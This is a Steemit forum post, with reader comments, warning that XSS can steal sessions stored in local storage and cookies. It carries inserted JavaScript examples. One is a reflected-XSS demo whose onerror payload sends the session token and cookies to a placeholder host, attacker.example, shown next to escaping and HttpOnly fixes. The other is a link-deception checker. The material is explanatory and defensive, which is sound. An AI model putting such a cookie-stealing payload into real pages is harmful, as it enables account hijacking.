[SECURITY BUG] Steemit vulnerable to session hijacking

in #steem, 8 years ago

This bug could affect all users on Steemit!

Why?

Steemit saves your session in the browser's local storage and in cookies. No additional protection is applied to that stored session data, so any script that runs on a Steemit page can read it.

How?

A crafted URL pasted here can make your browser run attacker-supplied script on a Steemit page, and that script can read your local storage and cookie contents and send them elsewhere. This class of attack is known as cross-site scripting (XSS). You would never notice it happened, but the consequences can be severe, up to and including a hijacked account.

How can I test this?

I won't reveal too much information in this post, to avoid encouraging deliberate XSS attacks. However, if you have basic JavaScript knowledge, you will be able to replicate the issue on your local machine.

If you know no JavaScript at all, search for "XSS attacks" on Google.
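The mechanism the "How?" section describes, shown as an added example that is not the author's reproduction and not Steemit's code: a search page that copies a query parameter into its markup, the crafted URL that turns that into script execution, the escaped rendering that closes the hole, and an in-memory model of what such a script can read from local storage and cookies. The search path, the hosts steemit.example and attacker.example, and the storage layouts are assumptions for illustration; the browser is simulated, so the block runs under Node.js without a DOM.

```javascript
// Added example, not Steemit's code: a reflected-XSS path from a crafted
// URL to the session data a page keeps in localStorage and cookies, the
// escaped rendering that closes it, and what an HttpOnly cookie changes.
// Runs under Node.js; no DOM is used, the browser is modelled in memory.

// Escape the characters that let input break out of an HTML text node
// or a double/single-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the q parameter is copied straight into page markup,
// which is what lets a crafted URL inject script into the page.
function renderSearchUnsafe(pageUrl) {
  const q = new URL(pageUrl).searchParams.get('q') || '';
  return `<h2>Results for: ${q}</h2>`;
}

// Hardened pattern: identical, but the parameter is HTML-escaped first.
function renderSearchSafe(pageUrl) {
  const q = new URL(pageUrl).searchParams.get('q') || '';
  return `<h2>Results for: ${escapeHtml(q)}</h2>`;
}

// Stand-in for the browser's HTML parser: true if the markup contains a
// <script> tag or an on* event-handler attribute inside a tag.
function containsInjectedScript(html) {
  return /<script\b|<[^>]*\bon[a-z]+\s*=/i.test(html);
}

// Constructed attacker payload (attacker.example is a placeholder host): an
// <img> that never loads, so its onerror handler runs and ships the session
// token from localStorage plus every script-readable cookie to the attacker.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+' +
  'encodeURIComponent(localStorage.getItem(\'session\')+document.cookie))">';

// steemit.example stands in for the real site; the search path is assumed.
const MALICIOUS_URL = 'https://steemit.example/search?q=' + encodeURIComponent(PAYLOAD);

// In-memory model of one origin's storage as the post describes it: the
// session token lives in localStorage and the cookies carry no HttpOnly flag.
function makeStorageAsDescribed() {
  return {
    localStorage: new Map([['session', 'sess-abc123']]),
    cookies: [{ name: 'pref', value: 'dark', httpOnly: false }],
  };
}

// Assumed hardening (not the fix the post mentions): the session token is
// an HttpOnly cookie and is no longer kept in localStorage at all.
function makeStorageHardened() {
  return {
    localStorage: new Map(),
    cookies: [
      { name: 'session', value: 'sess-abc123', httpOnly: true },
      { name: 'pref', value: 'dark', httpOnly: false },
    ],
  };
}

// Everything a script running on the page can read: all of localStorage and
// every cookie that is not HttpOnly (HttpOnly cookies never appear in document.cookie).
function secretsReadableByScript(storage) {
  const out = [];
  for (const [k, v] of storage.localStorage) out.push(`localStorage:${k}=${v}`);
  for (const c of storage.cookies) if (!c.httpOnly) out.push(`cookie:${c.name}=${c.value}`);
  return out;
}

function demo() {
  return {
    unsafeRenderExecutesPayload: containsInjectedScript(renderSearchUnsafe(MALICIOUS_URL)),
    safeRenderExecutesPayload: containsInjectedScript(renderSearchSafe(MALICIOUS_URL)),
    stolenAsDescribed: secretsReadableByScript(makeStorageAsDescribed()),
    stolenAfterHardening: secretsReadableByScript(makeStorageHardened()),
  };
}

console.log(demo());
```

Two points the model makes visible: escaping the reflected parameter removes the injection entirely, while an HttpOnly cookie only removes the token from what injected script can read. With the cookie alone, script that still runs on the page can make requests as the logged-in user, so both changes matter, and the escaping is the one that fixes the bug itself.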

OMG! Did you report this already?

The issue has been reported, along with a proposed fix to prevent this from happening.

Now what? Is my account in danger?

Your account is safe as long as you play by the rules of the internet.

Please, never - for real! - click a URL without knowing where it will lead you.

XSS hijacking is only one of many evil things that can happen to you when you click random links.



Also, don't trust short URLs.
To prevent XSS attacks you can use an add-on like NoScript.

Never trust any URL. For example:

https://steemit.com/market / https://www.google.com
will lead you to Google when you click it, even though you think it will lead you to the market.

Basic things, like hovering over the URL before clicking, which displays the true website you'll be visiting, should protect you from misleading evil URLs.
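What "hover and read the true destination" amounts to, done in code, as an added example that is not part of the comment above: the visible text of a link and its href are each resolved to a hostname and compared, and hrefs that smuggle a trusted-looking name into the userinfo part (the text before @) are flagged as well. The hosts steemit.com, www.google.com and attacker.example are illustrative values, not observed links.

```javascript
// Added example: compare what a link's text promises with where its href goes.
// Uses the WHATWG URL parser built into Node.js and browsers.

// If the visible text looks like a URL or a bare domain, return the host it
// suggests; otherwise null, since plain words such as "click here" promise
// no particular destination.
function hostSuggestedByText(text) {
  const t = text.trim();
  const hasScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(t);
  const looksLikeDomain = /^[a-z0-9.-]+\.[a-z]{2,}(?:[/?#]|$)/i.test(t);
  if (!hasScheme && !looksLikeDomain) return null;
  try {
    return new URL(hasScheme ? t : 'https://' + t).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Classify one anchor. "deceptive" means the text names one host but the
// href connects to another. "userinfo" flags hrefs such as
// https://steemit.com@attacker.example/ where the part before @ is a
// username, not the host, and the browser connects to attacker.example.
function inspectLink(text, href) {
  const u = new URL(href); // throws on an unparsable href
  const host = u.hostname.toLowerCase();
  const suggested = hostSuggestedByText(text);
  return {
    host,
    deceptive: suggested !== null && suggested !== host,
    userinfo: u.username !== '' || u.password !== '',
  };
}

// Constructed sample links: the pair from the comment above, a userinfo
// trick, an honest link, and plain link text that promises nothing.
const SAMPLE_LINKS = [
  ['https://steemit.com/market', 'https://www.google.com'],
  ['https://steemit.com/market', 'https://steemit.com@attacker.example/'],
  ['steemit.com/market', 'https://steemit.com/market'],
  ['the market', 'https://www.google.com'],
];

for (const [text, href] of SAMPLE_LINKS) {
  console.log(text, '->', href, inspectLink(text, href));
}
```

The comparison is on exact hostname, so a link whose text says steemit.com but whose href goes to a sibling subdomain is flagged too; for a warning shown before a click that bias toward flagging is the right one.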

That's pretty severe. I've played with XSS exploits before and it's relatively easy to craft an attack along this vector even for a non-professional dabbler.

How involved/difficult is the proposed fix? Think we would all sleep a little better knowing nasty shit like that is taken care of on the platform.

BTW, in the meantime until this is fixed, one way to protect yourself from the exploit is to make sure your internet browser is set to never remember your Steem password, and that the "keep me logged in" function is turned off.

I already did this (not saving my password in the Google browser). I am not even using the Steem mobile app (I have Android), as I would need to save the password in it. Arghh

Any malicious URL pasted here could lead to session hijacking when reading your local storage and cookie contents. This is also known as XSS attacks. You'll never notice it happened, but the consequences could be severe, resulting in a hijacked account.

It already happened about 2 weeks ago!

https://steemit.com/steemit/@steemitblog/important-security-announcement-steemit-ceo-ned-scott

https://cointelegraph.com/news/steemit-website-hacked-ceo-promises-to-reset-accounts-in-48-hours

https://news.bitcoin.com/steemit-hacked-weak-security/

Thanks for your warning. The issue needs to be fixed as soon as possible.

We need to stay vigilant

If you have more information or a specific vulnerability please email: [email protected]
